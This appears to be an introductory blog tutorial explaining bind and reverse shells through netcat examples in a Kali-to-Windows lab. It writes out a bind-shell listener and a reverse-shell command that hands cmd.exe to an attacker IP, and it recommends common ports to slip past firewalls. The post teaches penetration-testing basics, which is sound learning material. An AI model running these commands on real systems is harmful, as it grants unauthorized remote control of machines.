So what is a shell?
According to wikipedia:
In computing, a shell is a user interface for access to an operating system’s services. In general, operating system shells use either a command-line interface(CLI) or graphical user interface(GUI), depending on a computer’s role and particular operation. It is named a shell because it is the outermost layer around the operating system.
To make it simpler we all use a shell it is just a matter of how, most of us use a GUI (graphical user interface) which are the things on a screen that you click on and can interact with where as CLI(command-line interface) is something you would encounter more frequently if you are working in the tech industry via the command prompt or the terminal.
There are 2 type of shells.
- Bind Shell
- Reverse Shell
My Description of it
A bind shell or a reverse shell essentially is having the ability to run commands over CLI on another system(target) which would enable you to perform actions on the target system malicious or not. There are multiple ways to be able to achieve that but those are out of the scope of this article.
Both of these shells can be created via simple tools and utilities like nc, socat and powershell on windows, as nc(netcat) is the most popular and friendly to use I will be displaying all my examples in it.
Note: Netcat is not present on a windows machine by default so you would have to download it onto your target system if it is a windows system.
What is a Bind Shell ?
A Bind Shell is when the listener is running on the target and you are presented with a command shell when connecting to the target. In other words the target would be waiting for us to connect to it.
As an example we can say that you need to have your System Administrator at work connect to your office system (Windows) for some maintenance.
So on your office system you would open your command prompt (cmd.exe) and enter something similar to this:
nc -nvlp <PORT> -e cmd.exe
In this image we are using the nc.exe and essentially saying that anyone who connects to our system on the TCP port 4444 will be presented with a command shell (CLI).
To be able to connect to the windows system your System Administrator would have to know your IP address and the port you are hosting on which is 4444 in our case.
nc -nv <IP><PORT>
Now we can see that we are able to connect to the Windows machine from our Kali Linux machine which gives us the same amount of control a regular user would have on there own system via CLI.
After setting up a listener for a bind shell on a target machine you can scan it with a tool like nmap to confirm if the TCP port you set it up on is active and it should show up as something like this.
nmap -sC -sV <IP>
But what is a reverse shell?
When we use a bind shell we are able to connect to a target which is fine if there are no firewalls filtering inbound connections, where as in a reverse shell we would set up the listener on our system (attacker) and have the target connect to us and provide us with a command shell.
As an example we can say that we need a friend of ours to help us with something on our work system(Windows). To be able to receive a connection from us first our friend would need to set up a listener.
nc -lvnp <PORT>
Now to connect to our friend listening for a connection we would need to know the IP and the PORT to connect to.
nc -nv 192.168.96.130 4444 -e cmd.exe
Now we can see it is quite similar to a bind shell but while connecting to our friend we are providing them with a command shell with the ‘-e’ flag and passing the ‘cmd.exe’ as a parameter to it .
While on their end they would receive the connection as:
While both Bind and Reverse shells have their own advantages and disadvantages, it is a good practice to know both and when which one would serve our purposes better. While pen-testing you would find reverse shells to be a far more common occurrence than bind shells and is often what people refer to when they say the phrase “I got a shell on the box or system”.
On a personal note, you should prefer using Reverse Shells over Bind Shells for the following reasons:
- Bind shell opens up the target for unauthorized access by other actors and can be detected via simple network scanning tools as shown in the section about it.
- Reverse shells can use popular ports eg (53, 80, 443) to bypass firewall restrictions as they are allowed outbound connections from internal networks to external networks.
Systems Used:
- Attacker: Kali Linux 2020.1
- Target: Windows 10
Tools:
- nc(Windows and Linux)
